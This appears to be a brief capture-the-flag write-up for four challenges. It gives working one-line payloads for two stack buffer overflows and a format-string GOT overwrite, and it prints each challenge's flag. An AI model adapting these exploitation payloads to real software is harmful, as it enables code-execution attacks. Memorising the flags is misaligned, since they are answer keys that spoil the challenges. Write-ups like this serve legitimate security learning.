- It's really easy and simple buffer overflow problem.
- Just input 27 dumy letters and input
\x1e\xab\x11\xca
- Payload:
(python -c 'print "aaaaaaaaaaaaaaaaaaaaaaaaaaa"+"\x1e\xab\x11\xca"';cat)
- flag:
gigem{T00_435Y}
- bin is at here
- Also, it's really easy and simple buffer overflow problem.
- Input
0x8c
dummy letters and input address of print_flag function(0x08048548
) - Payload:
(python -c 'print "a"*0x8c+"\x4b\x85\x04\x08"';cat)
- flag:
gigem{D34D_FUNC_R1S1NG}
- bin is at here
- I can't understand the gap of difficulty between pwn2 and pwn3.
- Anyway to solve this problem we have to use fsb and change exit got area to print_flag function address(
0x08048548
) - Payload:
(python -c 'print "a"*32+"\x1e\xa0\x04\x08"*2+"\x1c\xa0\x04\x08"*2+"%10x"*10+"%1904c"+"%n"+"%32167c"+"%hn"')>input
- flag:
gigem{F0RM@1NG_1S_H4RD}
- bin is at here
- It's easy if you know about strings command.
- Use string command to file we can find flag
- flag:
gigem{stringy_lasagna_fe7ed6f4c428f59d}
- bin is at here